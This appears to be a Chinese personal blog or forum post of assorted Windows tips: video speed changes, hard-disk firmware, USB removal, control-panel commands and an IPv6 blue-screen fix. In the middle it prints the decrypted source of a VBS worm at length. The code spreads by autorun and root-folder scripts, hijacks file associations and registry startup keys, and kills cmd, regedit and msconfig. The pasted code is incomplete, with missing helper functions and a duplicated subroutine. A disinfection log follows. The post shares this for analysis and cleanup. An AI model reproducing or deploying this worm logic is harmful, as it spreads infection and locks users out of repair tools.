主题：个人经验总结帖，内容不定，不定期更新 -- 休眠火山

由于碰到一些事情，需要把视频的播放速度放慢，于是搜了一下如何使用免费软件进行改动。其实有很多收费软件可以做到这个事情，比如专业或不专业的是视频编辑软件，但既然免费软件可以做到这个，为什么不用呢？

据我不完全的调查结果，有几个办法可以做到。

笨办法一，使用免费软件VirtualDub。这个软件可以对视频进行一些处理，并且有大量的资料。但是不适合初学者。首先，为了打开视频，就需要额外做一些工作，以使软件能够识别视频格式，其次，保存视频也需要做一些下载和设置。

笨办法二，使用免费软件格式工厂对格式进行改变，然后结合VirtualDub或者微软自己的免费软件Movie Maker，编辑完成后再用格式工厂转化成自己想要的视频格式。缺点就是这两款软件默认的格式都是体积很大的，而且需要安装两款软件。不过就转换格式来说，我试用了几款免费软件，就支持的格式、界面整洁度及转化效果来看，还是格式工厂最佳。我曾经有个使用某设备录像得到的视频，使用freemake转化后看不到视频内容，使用暴风转码改变分辨率后整个图像变乱，只有使用格式工厂能得到最佳的结果。貌似免费软件狸窝也可以，但是广告太多，令人眼花。

笨办法三，使用格式工厂（实际上是Mencoder）。目前为止，格式工厂里是找不到设置视频速度的功能的。你可以试验改变帧速率，但是视频播放速度没有变化，只有帧数下降了。其实格式工厂很多的格式转换应该是依赖于免费软件Mplayer自带的Mencoder。不清楚有哪些格式是用的这个，看文件貌似还是有很多其他编码器的？没有细究。但是即使是收费软件Any Video Converter貌似也使用了Mencoder，因为有个设置视频速度的界面实际上就是设置Mencoder的参数。那么既然格式工厂里自带了Mencoder，那么就可以用上这一点，而不用重新下载Mplayer了。更重要的是，格式工厂里有很多的编码解码器，都是已经下载好的，而单独下载Mplayer则会缺乏一些编码解码包。Mencoder是命令行格式，所以需要自己手动输入，具体的格式需要自己看。不过如果你只是要把速度调慢或快，并且不要音频的话（因为音频变慢变快就难听了，另外配音不在本文讨论范围内，具体可以看Mencoder的使用说明），可以使用以下命令

mencoder -speed 1/4 input.avi -ovc copy -nosound -o output.avi

速度可以根据自己需要自己调节。这里是0.25。

我没有具体使用这个，所以不知道在高速时，帧速率过高会发生什么，有可能需要重新编码，使新视频的帧速降低，这个可以试，关键是工具。

其实格式工厂可以增加这个功能，并不难，不知道为什么没有增加。现在只有改变目标帧速的功能，但总时长不变。

笨办法四：使用avifrate。这个工具可以调节avi视频的帧速率，从而改变视频的速度。限制有二，首先是文件格式只能是avi格式的，其次不会对视频重新编码，所以如果你想提很高的速度，恐怕会被播放器拒绝，然后使用默认速度，调速就失败了。另外还有个问题就是它会直接修改目标视频，有可能会损坏文件，所以使用要慎重。一般情况下可以用格式工厂改格式为avi，然后用这个调节，然后在用格式工厂转换所需要的格式和目标帧速即可。适合新手。

暂时这些，如果有其他更方便的方法再添加。

待续。

这个是个老毛病了。好几年了。

有段时间希捷笔记本硬盘出了相同的毛病。具体表现为：不定期出现一声滴或者唧的声音，随后系统停止反应，两三秒后系统恢复正常，没有任何的问题。但不定时后会再次发作。

这个毛病非常烦人，在于它极度影响正常工作。

网上可以搜到大量的相关信息，英语里叫做clicking sound.

解决办法是，要么换，要么自己修。

自己修并不难，但是有风险。就是要下载一个合适的固件firmware，然后更改硬盘固件即可。

这个折腾了我很久。比较倒霉，总是碰到硬件缺陷。第一次是三星彩虹管事件，我陪着销售店家等了一天才让他看到现象并给我换了一台，结果还是一样的毛病，几个月后大规模爆发，三星承诺免费修。第二次就是这个了。在售后服务中心耗了一天，也没让他看见现象。后来我没办法自己用电脑的录音机功能把声音录下来，才让修理工程师相信，并耗到确实亲眼见到才同意给我修。结果给我换了主板，没解决问题，第二次修换了硬盘才部分解决问题。结果就是新硬盘出现这个现象的频率较低，偶尔一次，忍了。直到两年后，突然又加重，于是决定自己解决问题。

网上建议的硬件一个是dell的，一个是联想的，还有hp的。大部分反馈都是用联想的解决了问题。我的是hp的本子，所以先和hp的比较，发现hp的版本比我的还老。于是试验了dell的和联想的，结果都是更糟，频率变得非常频繁。由于条件限制，没有存自己的原始固件，只好使用hp的固件，没想到反而好了。

所以结论就是，什么固件适合你，需要试了才知道。老版固件未必不好。最后：刷固件有风险，自己动手需谨慎。

不知道2007以后的版本是否已经解决了这个问题。

而且这个问题也一般不会遇到的。

但遇到了也很难受，知道了解决办法也很容易。

一般人都说，是不是字体变小了？是不是打开了下标？

有这个可能。

但还有一个可能，是word本身的bug，这个是从一个英文的回复中找到的，感谢其原作者。

解决的方法，就是把视图放大到500%，然后变回来，图标就恢复了。

很简单。只要你知道哪里画那个圈圈。

拔u盘之前，遇到无法安全移除硬件的事情还是比较常见的。

一种是因为还有运行的程序在占用u盘上的文件，只需要关闭u盘上的程序或者被打开的文件即可。

一种是有软件正在占用u盘。比如杀毒软件或者qq之类偷看你u盘的软件。

一般使用unlocker这个软件，就可以看到正在暂用u盘的程序，并通过解锁来取消对u盘的占用，并安全移除。

但是也有unlocker看不到的情况，这个一般是驱动程序的缘故，我曾经遇到过intel主板驱动监测系统温度的软件会出现占用u盘的情况，进程里杀掉就能正常卸载了。

到底是什么在占用u盘，还有一个办法能看到。

右键点击我的电脑，并选择管理，左边点开系统事件查看器，windows日志，系统，然后看最近出现的黄色叹号，里边应该会告诉你哪个程序在占用着你的u盘。关掉即可操作安全删除硬件了。

Windows的命令列模式下有个非常好用的命令叫做Control。这个命令其实就是控制『控制台』的一个接口。你可以用这个命令直接叫起一些平常要找很久才会找到的窗口。你只要执行中输入命令参数就可以打开相应窗口。

以下列出一些网络上面找到的相关命令： &

命令参数

&

平台

&

说明

&

control admintools

&

2000/XP

&

开启『系统管理工具』窗口。

&

control desktop

&

95/98/ME/NT/2000/XP

&

开启『显示 内容』窗口。

&

control color

&

95/98/ME/NT/2000/XP

&

开启『显示 内容』窗口，并显示『外观』项目。

&

control date/time

&

95/98/ME/NT/2000/XP

&

开启『时间和日期 内容』窗口。

&

control folders

&

XP

&

开启『数据夹选项』窗口。

&

control fonts

&

95/98/ME/NT/2000/XP

&

开启『字型』窗口。

&

control infrared

&

95/98/ME/NT/2000/XP

&

开启『无线连结』窗口。

&

control international

&

95/98/ME/NT/2000/XP

&

开启『地区及语言选项』窗口。

&

control keyboard

&

95/98/ME/NT/2000/XP

&

开启『键盘 内容』窗口。

&

control mouse

&

95/98/ME/NT/2000/XP

&

开启『鼠标 内容』窗口。

&

control& netconnections

&

2000/XP

&

开启『网络联机』窗口。

&

control netware

&

2000/XP

&

开启『Netware』窗口。

&

control panel

&

2000/XP

&

开启『控制台』窗口。

&

control printers

&

95/98/ME/NT/2000/XP

&

开启『打印机和传真』窗口。

&

control schedtasks

&

2000/XP

&

开启『排定的工作』窗口。

&

control telephony

&

2000/XP

&

开启『位置信息』窗口。

&

control userpasswords

&

2000/XP

&

开启『使用者账户』窗口。

&

control userpasswords2

&

2000/XP

&

开启另一种『使用者账户』窗口。

此外，有一种扩展名为.cpl的档案。其实他就是各种在控制台内的工具。所以你可以透过

control xxx.cpl

这样的方式来开启该画面。sysdm.cpl 将打开系统属性小程序

Access.cpl:辅助功能选项

Appwiz.cpl:添加/删除程序

Desk.cpl:显示

Fax.cpl:传真向导

Hdwwiz.cpl:添加/删除硬件

Intl.cpl:区域语言选项

Joy.cpl:游戏控制器

Liccpa.cpl:许可

Main.cpl:鼠标

Mlcfg.cpl:邮件

Mmsys.cpl:声音和音频设备

Modem.cpl:电话和调制解调器选项

Ncpa.cpl:网络连接

Netcpl.cpl:网络和拨号连接

Nwc.cpl: Netware客户端连接

Odbccp32.cpl: ODBC数据源

Powercfg.cpl:电源管理

Sticpl.cpl:扫描仪和照相机

Sysdm.cpl:系统

Telephon.cpl:拨号规则和调制解调器

Timedate.cpl:日期和时间

杀完了以后，下面讲讲这个病毒本身。这个病毒隐藏自身非常巧妙，它是利用了NTFS分区的流功能把自身附加到了系统程序的后边。这样就达到了只要启动系统就自动中毒的目的。

好吧，我承认我已经把这个病毒解密了。这个病毒实际上比较简单，为什么杀毒软件不认呢，是因为病毒每次传染的时候都要用新的随机码进行自我加密。vbs病毒有个致命缺陷，就是必须是明码运行，因此必须自我解密才能运行。这样我们可以通过解密来看到病毒的明码，并对病毒进行杀毒处理。

首先，我要表示一下失望，因为我以为这个病毒能够几层嵌套来加密，结果只有一层。

其次，试着贴病毒程序代码内容：

On Error Resume Next
Dim Fso,WshShell
Set Fso=CreateObject("scRiPTinG.fiLEsysTeMoBjEcT")
Set WshShell=CreateObject("wScRipT.SHelL")
Call Main()
Sub Main()
 On Error Resume Next
 Dim Args, VirusLoad, VirusAss
 Set Args=WScript.Arguments
 VirusLoad=GetMainVirus(1)
 VirusAss=GetMainVirus(0)
 ArgNum=0
　Do While ArgNum < Args.Count
　Param=Param&" "&Args(ArgNum)
　ArgNum=ArgNum + 1
　Loop
SubParam=LCase(Right(Param, 3))
Select Case SubParam
Case "run"
RunPath=Left(WScript.ScriptFullName, 2)
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "txt", "log","ini" ,"inf"
RunPath="%SystemRoot%\system32\NOTEPAD.EXE "&Param
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "bat", "cmd"
RunPath="CMD /c echo Hi!I'm here!&pause"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "reg"
RunPath="regedit.exe "&""""&Trim(Param)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "chm"
RunPath="hh.exe "&""""&Trim(Param)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "hlp"
RunPath="winhlp32.exe "&""""&Trim(Param)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "dir"
RunPath=""""&Left(Trim(Param),Len(Trim(Param))-3)&""""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "oie"
RunPath="""%ProgramFiles%\Internet Explorer\IEXPLORE.EXE"""
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "omc"
RunPath="explorer.exe /n,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case "emc"
RunPath="explorer.exe /n,/e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
Call Run(RunPath)
Call InvadeSystem(VirusLoad,VirusAss)
Call Run("%SystemRoot%\system\svchost.exe "&VirusLoad)
Case Else
If PreDblInstance=True Then
WScript.Quit
End If
Timeout = Datediff("ww", GetInfectedDate, Date) - 12
If Timeout>0 And Month(Date) = Day(Date) Then
Call VirusAlert()
Call MakeJoke(CInt(Month(Date)))
End If
call MonitorSystem()
End Select
End Sub
Sub MonitorSystem()
On Error Resume Next
Dim ProcessNames, ExeFullNames
ProcessNames=Array("cmd.exe","cmd.com","regedit.exe","regedit.scr","regedit.pif","regedit.com","msconfig.exe")
VBSFullNames=Array(GetMainVirus(1))
Do
Call KillProcess(ProcessNames)
Call InvadeSystem(GetMainVirus(1),GetMainVirus(0))
Call KeepProcess(VBSFullNames)
WScript.Sleep 3000
Loop
End Sub
Sub InvadeSystem(VirusLoadPath,VirusAssPath)
On Error Resume Next
Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
Load_Value=""""&VirusLoadPath&""""
File_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" %1 %* "
IE_Value="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OIE "
MyCpt_Value1="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" OMC "
MyCpt_Value2="%SystemRoot%\System32\WScript.exe "&""""&VirusAssPath&""""&" EMC "
HCULoad="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
HCUVer="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
HCUDate="HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
VirusCode=GetCode(WScript.ScriptFullName)
Version=1
HostSourcePath=Fso.GetSpecialFolder(1)&"\Wscript.exe"
HostFilePath=Fso.GetSpecialFolder(0)&"\system\svchost.exe"
For Each Drive In Fso.Drives
If Drive.IsReady and (Drive.DriveType=1 Or Drive.DriveType=2 Or Drive.DriveType=3) Then
DiskVirusName=GetSerialNumber(Drive.DriveLetter)&".vbs"
Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
Call InfectRoot(Drive.DriveLetter,DiskVirusName)
End If
Next
If FSO.FileExists(VirusAssPath)=False Or FSO.FileExists(VirusLoadPath)=False Or FSO.FileExists(HostFilePath)=False Or GetVersion()< Version Then
If GetFileSystemType(GetSystemDrive())="NTFS" Then
Call CreateFile(VirusCode,VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call CopyFile(HostSourcePath,HostFilePath)
Call SetHiddenAttr(HostFilePath)
Else
Call CreateFile(VirusCode, VirusAssPath)
Call SetHiddenAttr(VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call SetHiddenAttr(VirusLoadPath)
Call CopyFile(HostSourcePath, HostFilePath)
Call SetHiddenAttr(HostFilePath)
End If
End If
If ReadReg(HCULoad)<>Load_Value& Then
Call WriteReg (HCULoad, Load_Value, "")
End If
If GetVersion() < Version Then
Call WriteReg (HCUVer, Version, "")
End If
If GetInfectedDate() = "" Then
Call WriteReg (HCUDate, Date, "")
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\")<>File_Value Then
Call SetTxtFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\")<>File_Value Then
Call SetIniFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\")<>File_Value Then
Call SetInfFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\")<>File_Value Then
Call SetBatFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\")<>File_Value Then
Call SetCmdFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\")<>File_Value Then
Call SetRegFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\")<>File_Value Then
Call SetchmFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\")<>File_Value Then
Call SethlpFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\")<>IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\")<>IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\")<>MyCpt_Value1 Then
Call SetMyComputerAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\")<>MyCpt_Value2 Then
Call SetMyComputerAss(VirusAssPath)
End If
Call RegSet()
End Sub
Sub CopyFile(source, pathf)
On Error Resume Next
If FSO.FileExists(pathf) Then
FSO.DeleteFile pathf , True
End If
FSO.CopyFile source, pathf
End Sub
Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText=FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText=FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText=FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText=FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub RegSet()
On Error Resume Next
Dim RegPath1 , RegPath2, RegPath3, RegPath4
RegPath1="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue"
RegPath2="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue"
RegPath3="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun"
RegPath4="HKEY_CLASSES_ROOT\lnkfile\IsShortcut"
Call WriteReg (RegPath1, 3, "REG_DWORD")
Call WriteReg (RegPath2, 2, "REG_DWORD")
Call WriteReg (RegPath3, 0, "REG_DWORD")
Call DeleteReg (RegPath4)
End Sub
Sub KillProcess(ProcessNames)
On Error Resume Next
Set WMIService=GetObject("winmgmts:\\.\root\cimv2")
For Each ProcessName in ProcessNames 
Set ProcessList=WMIService.execquery(" Select * From win32_process where name ='"&ProcessName&"' ")
For Each Process in ProcessList
IntReturn=Process.terminate
If intReturn<>0 Then
WshShell.Run "CMD /c ntsd -c q -p "&Process.Handle, vbHide, False
End If
Next
Next
End Sub
Sub KillImmunity(D)
On Error Resume Next
ImmunityFolder=D&":\Autorun.inf"
If Fso.FolderExists(ImmunityFolder) Then
WshSHell.Run ("CMD /C CACLS "& """"&ImmunityFolder&"""" &" /t /e /c /g everyone:f"),vbHide,True
WshSHell.Run ("CMD /C RD /S /Q "& ImmunityFolder), vbHide, True
End If
End Sub
Sub KeepProcess(VBSFullNames)
On Error Resume Next
For Each VBSFullName in VBSFullNames 
If VBSProcessCount(VBSFullName) < 2 then
Run("%SystemRoot%\system\svchost.exe "&VBSFullName)
End If
Next
End Sub
Function GetSystemDrive()
GetSystemDrive=Left(Fso.GetSpecialFolder(0),2)
End Function
Function GetFileSystemType(Drive)
Set d=FSO.GetDrive(Drive)
GetFileSystemType=d.FileSystem
End Function
Function ReadReg(strkey)
Dim tmps
Set tmps=CreateObject("WScript.Shell")
ReadReg=tmps.RegRead(strkey)
Set tmps=Nothing
End Function
Sub WriteReg(strkey, Value, vtype)
Dim tmps
Set tmps=CreateObject("WScript.Shell")
If vtype="" Then
tmps.RegWrite strkey, Value
Else
tmps.RegWrite strkey, Value, vtype
End If
Set tmps=Nothing
End Sub
Sub DeleteReg(strkey)
Dim tmps
Set tmps=CreateObject("WScript.Shell")
tmps.RegDelete strkey
Set tmps=Nothing
End Sub

字数限制，必须分页了。

一直以来，在半生不熟的情况下，为不少电脑清了不少病毒，都是瞎胡闹，不过也多少积攒了点经验，在高人眼里是不值一哂，自己却觉得需要记录一下，以备自己使用。

这两天遇到一个老师的电脑只能上内网，不能上外网，已经确认网络没问题，所以问题肯定是电脑身上了。以下是过程：

1.试图进安全模式失败。

2.插u盘，发现vbs常见手段：产生autorun文件，产生vbs文件，文件名是随机数字，隐藏所有文件夹并加上系统属性和隐藏属性，建立快捷方式。

3.运行kv移动版，杀掉一大堆病毒。运行sreng，提示隐藏进程，提示启动项有修改，文件关联被修改。修复安全模式。

4.进安全模式，用kv杀，结果一个都没有了，但进入正常模式后问题依旧。

5.安装360杀毒和安全卫士，基本等于废物，没找到任何问题。顽固木马专杀由于不能上网，所以没法用。

5.用sreng大胆杀掉没有经过验证的可疑服务和驱动，用360结束可疑进程。并删除可疑文件。其中需要提到的就是一个隐藏在多种可能的文件夹下，文件夹名称含%sessionname%的文件，内部有xm为后缀名的文件，还有貌似后缀为pt的文件，直接杀不掉。

6。用最新病毒库的kv再在安全模式下杀。成功杀掉一些以前没有的病毒和木马下载器。进入正常模式后，发现大部分病毒都清得差不多了，上述文件夹和内容可以删除了。使用netstat -on 没有发现可疑进程发数据包。但仍然无法连外网。而且vbs病毒明显仍然起作用。

于是决定先把病毒清理干净再说。

7.经上网查，发现这个病毒替换了系统的正常文件，而这个是我一般尽量不去涉及的（确认是否是正常文件需要两个电脑，一个正常的，费时费力，我一般在确认有问题时才去解决这个问题）。

8.网上解决方法如下

9.继续：

实际杀毒过程同这个有所不同。由于病毒相当于直接修改了explorer，所以首先进入命令行安全模式后，用命令行进行处理，可以防止病毒启动。进入命令行将explorer和smss分别复制到fat32分区，然后复制回来，由于这样不确定是否能够把附加流去掉，所以用了一个很取巧的办法：使用命令行把两个文件复制到FAT32分区后，运行复制后的explorer，这样保证了其干净，然后在新程序下将explorer和smss分别复制到fat32分区，然后复制回来并覆盖。复制过程中提示有流信息丢失，说明方法有效。然后在命令行将所有分区根目录下.vbs文件，autorun文件以及快捷方式全部删除，修改目录属性为可见，非系统。打开注册表，删除所有.vbs所对应不正常的项。删除system目录下的svchost。重启后恢复正常。

（这个问题其实没有彻底解决，但也算一个妥协的办法吧。）

使用ipv6网络，使用utorrent下载有些人出现了蓝屏问题。蓝屏提示一般是tcpip6.sys出现问题。已经确认不是和其他软件冲突。

从网上搜索，可以发现很多人也有这个问题，但是没有解决方法。我所探索的结果如下：

1. 这个问题是xp系统中的tcpip6.sys本身的问题，尤其是最新版本，问题更甚，我的原来的版本更新一些，忘了是多少了，蓝屏，后从网上下载的版本是5.1.2600.5512，结果好了几天，后来又出现蓝屏问题。

2.这个问题的根本是tcpip6.sys 本身的bug，由于微软不提供修复，所以没办法解决。更换支持ipv6的bt软件，即使是最新版的bittorrent，都不行，照样蓝屏。

个人解决办法：

1.升级系统到win7，据说win7没有这个问题。

2.因为问题的根本是并发数的问题，如果仍然坚持要xp，就把任务里的数量降低，由于bt是个时效性很强的软件，所以可以把一些以前下载的任务去除掉，或者不需要的任务删掉，虽然这不利于分享，但为了能用，只好忍痛割爱。我的任务数大约在50个以下，基本上没有问题，新建下载任务的时候，提前去掉一些任务即可。网上这方面的问题出现的不多，说明大部分人上传的任务数是非常有限的，拿来主义的多啊。

其实，就这么简单。

虽然我知道SB指Sound Blaster，8倍的SB得多变态，hehe。